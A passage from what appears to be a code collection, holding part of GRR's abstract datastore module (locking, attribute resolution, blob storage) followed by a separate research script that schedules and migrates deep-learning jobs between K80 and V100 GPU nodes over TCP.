token: An ACL token.
retrywrap_max_timeout: The maximum time to wait for a retry until we
raise.
blocking: If False, raise on first lock failure.
lease_time: lock lease time in seconds.
Returns:
The DBSubjectLock object
Raises:
DBSubjectLockError: If the maximum retry count has been reached.
"""
timeout = 0
while timeout < retrywrap_max_timeout:
try:
return self.DBSubjectLock(subject, token=token, lease_time=lease_time)
except DBSubjectLockError:
if not blocking:
raise
stats.STATS.IncrementCounter("datastore_retries")
time.sleep(retrywrap_timeout)
timeout += retrywrap_timeout
raise DBSubjectLockError("Retry number exceeded.")
@abc.abstractmethod
def DBSubjectLock(self, subject, lease_time=None, token=None):
"""Returns a DBSubjectLock object for a subject.
This opens a read/write lock to the subject. Any read access to the subject
will have a consistent view between threads. Any attempts to write to the
subject must be performed under lock. DBSubjectLocks may fail and raise the
DBSubjectLockError() exception.
Users should almost always call LockRetryWrapper() to retry if the lock
isn't obtained on the first try.
Args:
subject: The subject which the lock applies to. Only a
single subject may be locked in a lock.
lease_time: The minimum amount of time the lock should remain
alive.
token: An ACL token.
Returns:
A lock object.
"""
@abc.abstractmethod
def MultiSet(self,
subject,
values,
timestamp=None,
replace=True,
sync=True,
to_delete=None,
token=None):
"""Set multiple attributes' values for this subject in one operation.
Args:
subject: The subject this applies to.
values: A dict with keys containing attributes and values, serializations
to be set. values can be a tuple of (value, timestamp). Value must
be one of the supported types.
timestamp: The timestamp for this entry in microseconds since the
epoch. None means now.
replace: Bool whether or not to overwrite current records.
sync: If true we block until the operation completes.
to_delete: An array of attributes to clear prior to setting.
token: An ACL token.
"""
def MultiDeleteAttributes(self,
subjects,
attributes,
start=None,
end=None,
sync=True,
token=None):
"""Remove all specified attributes from a list of subjects.
Args:
subjects: The list of subjects that will have these attributes removed.
attributes: A list of attributes.
start: A timestamp, attributes older than start will not be deleted.
end: A timestamp, attributes newer than end will not be deleted.
sync: If true we block until the operation completes.
token: An ACL token.
"""
for subject in subjects:
self.DeleteAttributes(
subject, attributes, start=start, end=end, sync=sync, token=token)
@abc.abstractmethod
def DeleteAttributes(self,
subject,
attributes,
start=None,
end=None,
sync=True,
token=None):
"""Remove all specified attributes.
Args:
subject: The subject that will have these attributes removed.
attributes: A list of attributes.
start: A timestamp, attributes older than start will not be deleted.
end: A timestamp, attributes newer than end will not be deleted.
sync: If true we block until the operation completes.
token: An ACL token.
"""
def Resolve(self, subject, attribute, token=None):
"""Retrieve a value set for a subject's attribute.
This method is easy to use but always gets the latest version of the
attribute. It is more flexible and efficient to use the other Resolve
methods.
Args:
subject: The subject URN.
attribute: The attribute.
token: An ACL token.
Returns:
A (value, timestamp in microseconds) stored in the datastore cell, or
(None, 0). Value will be the same type as originally stored with Set().
Raises:
AccessError: if anything goes wrong.
"""
for _, value, timestamp in self.ResolveMulti(
subject, [attribute], token=token, timestamp=self.NEWEST_TIMESTAMP):
# Just return the first one.
return value, timestamp
return (None, 0)
@abc.abstractmethod
def MultiResolvePrefix(self,
subjects,
attribute_prefix,
timestamp=None,
limit=None,
token=None):
"""Generate a set of values matching for subjects' attribute.
This method provides backwards compatibility for the old method of
specifying regexes. Each datastore can move to prefix matching by
overriding this method and ResolvePrefix below.
Args:
subjects: A list of subjects.
attribute_prefix: The attribute prefix.
timestamp: A range of times for consideration (In
microseconds). Can be a constant such as ALL_TIMESTAMPS or
NEWEST_TIMESTAMP or a tuple of ints (start, end). Inclusive of both
lower and upper bounds.
limit: The total number of result values to return.
token: An ACL token.
Returns:
A dict keyed by subjects, with values being a list of (attribute, value
string, timestamp).
Values with the same attribute (happens when timestamp is not
NEWEST_TIMESTAMP, but ALL_TIMESTAMPS or time range) are guaranteed
to be ordered in the decreasing timestamp order.
Raises:
AccessError: if anything goes wrong.
"""
def ResolvePrefix(self,
subject,
attribute_prefix,
timestamp=None,
limit=None,
token=None):
"""Retrieve a set of value matching for this subject's attribute.
Args:
subject: The subject that we will search.
attribute_prefix: The attribute prefix.
timestamp: A range of times for consideration (In
microseconds). Can be a constant such as ALL_TIMESTAMPS or
NEWEST_TIMESTAMP or a tuple of ints (start, end).
limit: The number of results to fetch.
token: An ACL token.
Returns:
A list of (attribute, value string, timestamp).
Values with the same attribute (happens when timestamp is not
NEWEST_TIMESTAMP, but ALL_TIMESTAMPS or time range) are guaranteed
to be ordered in the decreasing timestamp order.
Raises:
AccessError: if anything goes wrong.
"""
for _, values in self.MultiResolvePrefix(
[subject],
attribute_prefix,
timestamp=timestamp,
token=token,
limit=limit):
values.sort(key=lambda a: a[0])
return values
return []
def ResolveMulti(self,
subject,
attributes,
timestamp=None,
limit=None,
token=None):
"""Resolve multiple attributes for a subject.
Results may be in unsorted order.
Args:
subject: The subject to resolve.
attributes: The attribute string or list of strings to match. Note this is
an exact match, not a regex.
timestamp: A range of times for consideration (In
microseconds). Can be a constant such as ALL_TIMESTAMPS or
NEWEST_TIMESTAMP or a tuple of ints (start, end).
limit: The maximum total number of results we return.
token: The security token used in this call.
"""
def ResolveRow(self, subject, **kw):
return self.ResolvePrefix(subject, "", **kw)
@abc.abstractmethod
def Flush(self):
"""Flushes the DataStore."""
def Size(self):
"""DataStore size in bytes."""
return -1
def __del__(self):
if self.flusher_thread:
self.flusher_thread.Stop()
if self.monitor_thread:
self.monitor_thread.Stop()
try:
self.Flush()
except Exception: # pylint: disable=broad-except
pass
def _CleanSubjectPrefix(self, subject_prefix):
subject_prefix = utils.SmartStr(rdfvalue.RDFURN(subject_prefix))
if subject_prefix[-1] != "/":
subject_prefix += "/"
return subject_prefix
def _CleanAfterURN(self, after_urn, subject_prefix):
if after_urn:
after_urn = utils.SmartStr(after_urn)
if not after_urn.startswith(subject_prefix):
raise RuntimeError("after_urn \"%s\" does not begin with prefix \"%s\""
% (after_urn, subject_prefix))
return after_urn
@abc.abstractmethod
def ScanAttributes(self,
subject_prefix,
attributes,
after_urn=None,
max_records=None,
token=None,
relaxed_order=False):
"""Scan for values of multiple attributes across a range of rows.
Scans rows for values of attribute. Reads the most recent value stored in
each row.
Args:
subject_prefix: Subject beginning with this prefix can be scanned. Must
be an aff4 object and a directory - "/" will be appended if necessary.
User must have read and query permissions on this directory.
attributes: A list of attribute names to scan.
after_urn: If set, only scan records which come after this urn.
max_records: The maximum number of records to scan.
token: The security token to authenticate with.
relaxed_order: By default, ScanAttribute yields results in lexographic
order. If this is set, a datastore may yield results in a more
convenient order. For certain datastores this might greatly increase
the performance of large scans.
Yields: Pairs (subject, result_dict) where result_dict maps attribute to
(timestamp, value) pairs.
"""
def ScanAttribute(self,
subject_prefix,
attribute,
after_urn=None,
max_records=None,
token=None,
relaxed_order=False):
for s, r in self.ScanAttributes(
subject_prefix, [attribute],
after_urn=after_urn,
max_records=max_records,
token=token,
relaxed_order=relaxed_order):
ts, v = r[attribute]
yield (s, ts, v)
def ReadBlob(self, identifier, token=None):
return self.ReadBlobs([identifier], token=token).values()[0]
def ReadBlobs(self, identifiers, token=None):
return self.blobstore.ReadBlobs(identifiers, token=token)
def StoreBlob(self, content, token=None):
return self.blobstore.StoreBlob(content, token=token)
def StoreBlobs(self, contents, token=None):
return self.blobstore.StoreBlobs(contents, token=token)
def BlobExists(self, identifier, token=None):
return self.BlobsExist([identifier], token=token).values()[0]
def BlobsExist(self, identifiers, token=None):
return self.blobstore.BlobsExist(identifiers, token=token)
def DeleteBlob(self, identifier, token=None):
return self.DeleteBlobs([identifier], token=token)
def DeleteBlobs(self, identifiers, token=None):
return self.blobstore.DeleteBlobs(identifiers, token=token)
def GetMutationPool(self, token=None):
return self.mutation_pool_cls(token=token)
class DBSubjectLock(object):
"""Provide a simple subject lock using the database.
This class should not be used directly. Its only safe to use via the
DataStore.LockRetryWrapper() above which implements correct backoff and
retry behavior.
"""
__metaclass__ = registry.MetaclassRegistry
def __init__(self, data_store, subject, lease_time=None, token=None):
"""Obtain the subject lock for lease_time seconds.
This is never called directly but produced from the
DataStore.LockedSubject() factory.
Args:
data_store: A data_store handler.
subject: The name of a subject to lock.
lease_time: The minimum length of time the lock will remain valid in
seconds. Note this will be converted to usec for storage.
token: An ACL token which applies to all methods in this lock.
"""
self.subject = utils.SmartStr(subject)
self.store = data_store
self.token = token
# expires should be stored as usec
self.expires = None
self.locked = False
if lease_time is None:
lease_time = config_lib.CONFIG["Datastore.transaction_timeout"]
self._Acquire(lease_time)
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Release()
def _Acquire(self, lease_time):
raise NotImplementedError
def Release(self):
raise NotImplementedError
def UpdateLease(self, duration):
"""Update the lock lease time by at least the number of seconds.
Note that not all data stores implement timed locks. This method is
only useful for data stores which expire a lock after some time.
Args:
duration: The number of seconds to extend the lock lease.
"""
raise NotImplementedError
def CheckLease(self):
"""Return the time remaining on the lock in seconds."""
if not self.expires:
return 0
return max(0, self.expires / 1e6 - time.time())
def __del__(self):
try:
self.Release()
except Exception: # This can raise on cleanup pylint: disable=broad-except
pass
class ResultSet(object):
"""A class returned from Query which contains all the result."""
# Total number of results that could have been returned. The results returned
# may have been limited in some way.
total_count = 0
def __init__(self, results=None):
if results is None:
results = []
self.results = results
def __iter__(self):
return iter(self.results)
def __getitem__(self, item):
return self.results[item]
def __len__(self):
return len(self.results)
def __iadd__(self, other):
self.results = list(self.results) + list(other)
return self
def Append(self, item):
self.results.append(item)
class DataStoreInit(registry.InitHook):
"""Initialize the data store.
Depends on the stats module being initialized.
"""
pre = ["UserManagersInit"]
def _ListStorageOptions(self):
for name, cls in DataStore.classes.items():
print "%s\t\t%s" % (name, cls.__doc__)
def Run(self):
"""Initialize the data_store."""
global DB # pylint: disable=global-statement
if flags.FLAGS.list_storage:
self._ListStorageOptions()
sys.exit(0)
try:
cls = DataStore.GetPlugin(config_lib.CONFIG["Datastore.implementation"])
except KeyError:
msg = ("No Storage System %s found." %
config_lib.CONFIG["Datastore.implementation"])
print msg
print "Available options:"
self._ListStorageOptions()
raise RuntimeError(msg)
DB = cls() # pylint: disable=g-bad-name
DB.Initialize()
atexit.register(DB.Flush)
monitor_port = config_lib.CONFIG["Monitoring.http_port"]
if monitor_port != 0:
stats.STATS.RegisterGaugeMetric(
"datastore_size",
int,
docstring="Size of data store in bytes",
units="BYTES")
DB.InitializeMonitorThread()
def RunOnce(self):
"""Initialize some Varz."""
stats.STATS.RegisterCounterMetric("grr_commit_failure")
stats.STATS.RegisterCounterMetric("datastore_retries")
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
import csv
from sklearn import neighbors
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
with open('k80_time.json', 'r') as fp:
k80_time = json.load(fp)
with open('data/pwr.json', 'r') as fp:
pwr_dict = json.load(fp)
with open('data/util.json', 'r') as fp:
util_dict = json.load(fp)
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
for item in queue:
JCT[str(item)] = 0
completion = {}
for item in queue:
completion[str(item)] = 0
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
b_start = {} # initialize this to 0 as well
for item in queue:
b_start[str(item)] = 0
c_start = {} # initialize this to 0 as well
for item in queue:
c_start[str(item)] = 0
d_start = {} # initialize this to 0 as well
for item in queue:
d_start[str(item)] = 0
ovhd_a = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_a[str(item)] = []
ovhd_b = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_b[str(item)] = []
ovhd_c = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_c[str(item)] = []
ovhd_d = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_d[str(item)] = []
ovhd_total = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_total[str(item)] = []
k80_1st = {}
for item in queue:
k80_1st[str(item)] = []
v100_1st = {}
for item in queue:
v100_1st[str(item)] = []
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
K80_epoch_time = {}
for item in queue:
K80_epoch_time[str(item)] = 0
K80_start_time = {}
for item in queue:
K80_start_time[str(item)] = 0
V100_start_time = {}
for item in queue:
V100_start_time[str(item)] = 0
K80_time = {}
for item in queue:
K80_time[str(item)] = 0
V100_time = {}
for item in queue:
V100_time[str(item)] = 0
gpu_usage_time = [] # don't initialize this
gpu_usage = []
gpu_usage_completion = []
speedup_dict = {}
for item in queue:
speedup_dict[str(item)] = 0
predict_dict = {}
for item in queue:
predict_dict[str(item)] = 0
index = 0
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
qualified_job = []
step1_job = []
step2_job = []
pc_job = []
K80_node = 'c2180'
V100_node = 'd1020'
host_node = 'c0200'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
######################### do a regression fit ########################
with open('x_data.json') as f:
x_train = json.load(f)
with open('y_data.json') as f:
y_train = json.load(f)
model = neighbors.KNeighborsRegressor(n_neighbors = 1, weights='distance')
model.fit(x_train, y_train)
####################################################################
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
def max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
V100_vacant = num_demote + V100_free
K80_vacant = num_promote + K80_free
global speedup_dict
if K80_vacant >= num_demote: # if more vacant K80s than demote jobs, always demote
# selectively promote among active V100 jobs and promote list jobs
V100_qual = list(set(list(V100_job.values())) - set(force_demote))
if 'idle' in V100_qual:
V100_qual.remove('idle')
V100_pool = list(set(V100_qual).union(promote_list))
if len(V100_pool) <= 4: # promote all jobs as well
return promote_list, force_demote
else: # promote the top 4 jobs
pool_dict = {}
for job in V100_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:4]
promotion_list = list(set(promote_list).intersection(sorted_pool))
demotion_list = list(set(list(V100_job.values())).difference(sorted_pool))
if 'idle' in demotion_list:
demotion_list.remove('idle') # this includes force demotion
#### lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with
#### K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.1, replace the K80 job
#### in sorted pool
###global ovhd_total
###for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
### if job_demote in demotion_list:
### for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
### if job_promote in promotion_list:
### # calculate overhead of demoting and promoting jobs
### demo_ovhd = np.mean(ovhd_total[job_demote])
### if len(ovhd_total[job_promote]) > 0:
### promo_ovhd = np.mean(ovhd_total[job_promote])
### else:
### promo_ovhd = demo_ovhd
### value = (speedup_dict[job_promote] - speedup_dict[job_demote])*2000/100 - (promo_ovhd +
### demo_ovhd + 2 * 90)
### if value < 0:
### demotion_list.remove(job_demote)
### promotion_list.remove(job_promote)
### break
return promotion_list, demotion_list
elif V100_vacant >= num_promote: # if more vacant V100s than promote jobs, always promote
# less vacant K80s than demote jobs, select worst among force demote list
pool_dict = {} # here the pool only includes force demote jobs
for job in force_demote:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_vacant]
if len(sorted_pool) > 0:
raise ValueError('Bug, demotion shouldnt happen because no practical complete')
return promote_list, sorted_pool
else:
raise ValueError('Bug with max speedup promotion, condition not considered')
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
global pid_dict
pid = pid_dict['job'+job]
send_signal(node, 'save ' + job + ' pid ' + pid) # 'save 50 pid 10000'
global ovhd_start
ovhd_start[job] = time.time()
time.sleep(3) # in case epoch_waste is communicate too frequently
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# start job
def start_job(node, gpu, job):
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# function that checks the tensorboard log of currently running jobs and logs jobs that have finished the first epoch
# in a global list. Once it's done, it will be in a queue to be promoted to V100 for 3 more epochs.
def check_step1_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global K80_epoch_time
for job in job_list:
if job not in step1_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 0:
tc = dirs[0]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
K80_epoch_time[job] = wall_time[1] - wall_time[0]
step1_job.append(job)
print('job' + job + ' has reached step1 complete')
except Exception:
pass
def check_step2_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global step2_job
global K80_epoch_time
global speedup_dict
for job in job_list:
if job in step1_job and job not in step2_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 1:
tc = dirs[1]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
K80_time_step2 = K80_epoch_time[job]
V100_time_step2 = wall_time[1] - wall_time[0]
speedup = (K80_time_step2 - V100_time_step2) / K80_time_step2
speedup_dict[job] = speedup
step2_job.append(job)
print('job' + job + ' has reached step2 complete')
except Exception:
pass
############### first clear finish status of all jobs ####################
pid_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
pid_dict[job_name] = 0
checkpoint_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
checkpoint_dict[job_name] = 0
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
epoch_waste_dict[job_name] = 0
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
global K80_start_time
global V100_start_time
global K80_job
global v100_job
global K80_time
global V100_time
global ovhd_a, ovhd_b, ovhd_c, ovhd_d, k80_1st, v100_1st, ovhd_start, overhead, ovhd_total
global b_start, c_start, d_start, completion
if 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
finish_dict[job_name] = 1
JCT[job] = int(time.time() - job_start[job])
if job in list(K80_job.values()):
K80_time[job] += int(time.time() - K80_start_time[job])
elif job in list(V100_job.values()):
V100_time[job] += int(time.time() - V100_start_time[job])
elif 'pid' in data_str:
global pid_dict
job_name = data_str.split(' ')[0]
pid = data_str.split(' ')[2]
pid_dict[job_name] = pid
elif 'checkpoint' in data_str: # can only be received after save signal is sent
global checkpoint_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
checkpoint_dict[job_name] = 1
ovhd_a[job].append(int(time.time() - ovhd_start[job]))
b_start[job] = time.time()
elif 'waste' in data_str:
global epoch_waste_dict
job_name = data_str.split(' ')[0]
epoch_waste_time = data_str.split(' ')[2]
epoch_waste_dict[job_name] += int(epoch_waste_time)
elif 'b_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_b[job].append(int(time.time() - b_start[job]))
c_start[job] = time.time()
elif 'c_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_c[job].append(int(time.time() - c_start[job]))
d_start[job] = time.time()
elif 'd_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_d[job].append(int(time.time() - d_start[job]))
ovhd_total[job].append(int(time.time() - ovhd_start[job]))
if ovhd_start[job] != 0:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
if job in list(K80_job.values()):
K80_start_time[job] = time.time()
elif job in list(V100_job.values()):
V100_start_time[job] = time.time()
elif '1st_epoch' in data_str: # 'job50 1st_epoch 35'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
epoch_time = int(data_str.split(' ')[2])
if job in list(K80_job.values()):
k80_1st[job].append(epoch_time)
elif job in list(V100_job.values()):
v100_1st[job].append(epoch_time)
elif 'completion' in data_str: # 'job50 completion 0.33'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
completion_portion = float(data_str.split(' ')[2])
completion[job] = completion_portion
if 'ckpt_qual' in data_str or 'finish' in data_str or 'checkpoint' in data_str:
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
################ check step1 finished job of K80 jobs and step 2 of V100 #################
check_step1_complete(list(K80_job.values()))
check_step2_complete(list(V100_job.values()))
for job in list(K80_job.values()):
if job not in qualified_job and job != 'idle':
x2 = 3600 / k80_time[job]
x1 = pwr_dict[job]
x3 = util_dict[job]
if x1 > 0:
if job in step1_job:
qualified_job.append(job)
print('job' + job + ' has been qualified for promotion')
speedup_pred = model.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100
speedup_dict[job] = speedup_pred
predict_dict[job] = speedup_pred
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
# this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete
promote_list = list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
if len(promote_list) > 0:
promoted, demoted = max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, force_demote)
if len(promoted) > 0:
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
checkpoint_finish_check = []
for gpu, job in K80_job.items():
if job in promoted:
# make sure promoted step1 job doesn't get demoted back before finishing profiling
if job in step1_job and job not in step2_job:
speedup_dict[job] = 2
save_job(K80_node, job)
if finish_dict['job'+job] != 1:
K80_time[job] += int(time.time() - K80_start_time[job])
checkpoint_finish_check.append(job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
save_job(V100_node, job)
if finish_dict['job'+job] != 1:
V100_time[job] += int(time.time() - V100_start_time[job])
checkpoint_finish_check.append(job)
V100_job[gpu] = 'idle'
V100_used -= 1
# wait for all GPUs to be available
if len(checkpoint_finish_check) > 0:
while True:
time.sleep(5)
for job in checkpoint_finish_check[:]:
if checkpoint_dict['job'+job] == 1: # checkpoint has finished, gpu is free
print(job + ' checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
checkpoint_finish_check.remove(job)
# also check if job already finished before sending checkpoint signal
elif finish_dict['job'+job] == 1:
print(job + ' finished before receiving checkpoint signal')
checkpoint_finish_check.remove(job)
if len(checkpoint_finish_check) == 0:
break
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
V100_job[gpu] = job_new
resume_job(V100_node, gpu, job_new)
num_mig[job_new] += 1
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if K80_used < K80_cap:
K80_free = K80_cap - K80_used
for i in range(K80_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in K80_job.items():
if job == 'idle': # schedule new job here if idle
start_job(K80_node, gpu, job_new)
K80_job[gpu] = job_new
job_start[job_new] = time.time()
K80_start_time[job_new] = time.time()
index += 1
K80_used += 1
time.sleep(5) # don't communicate too often
break
############## monitor GPU usage ############
usage = K80_used + V100_used
time_stamp = int(time.time() - queue_timer)
gpu_usage_time.append(time_stamp)
gpu_usage.append(usage)
total_completion = np.sum(list(completion.values()))
gpu_usage_completion.append(total_completion)
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
K80_time_name = testcase + '_K80_time.json'
V100_time_name = testcase + '_V100_time.json'
gpu_usage_name = testcase + '_gpu_usage.csv'
ovhd_a_name = testcase + '_ovhd_a.json'
ovhd_b_name = testcase + '_ovhd_b.json'
ovhd_c_name = testcase + '_ovhd_c.json'
ovhd_d_name = testcase + '_ovhd_d.json'
ovhd_total_name = testcase + '_ovhd_total.json'
k80_1st_name = testcase + '_k80_1st.json'
v100_1st_name = testcase + '_v100_1st.json'
speedup_name = 'speedup.json'
predict_name = 'predict.json'
completion_name = 'completion.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
with open(K80_time_name, 'w') as fp3:
json.dump(K80_time, fp3, sort_keys=True, indent=4)
with open(V100_time_name, 'w') as fp3:
json.dump(V100_time, fp3, sort_keys=True, indent=4)
with open(ovhd_a_name, 'w') as fp3:
json.dump(ovhd_a, fp3, sort_keys=True, indent=4)
with open(ovhd_b_name, 'w') as fp3:
json.dump(ovhd_b, fp3, sort_keys=True, indent=4)
with open(ovhd_c_name, 'w') as fp3:
json.dump(ovhd_c, fp3, sort_keys=True, indent=4)
with open(ovhd_d_name, 'w') as fp3:
json.dump(ovhd_d, fp3, sort_keys=True, indent=4)
with open(ovhd_total_name, 'w') as fp3:
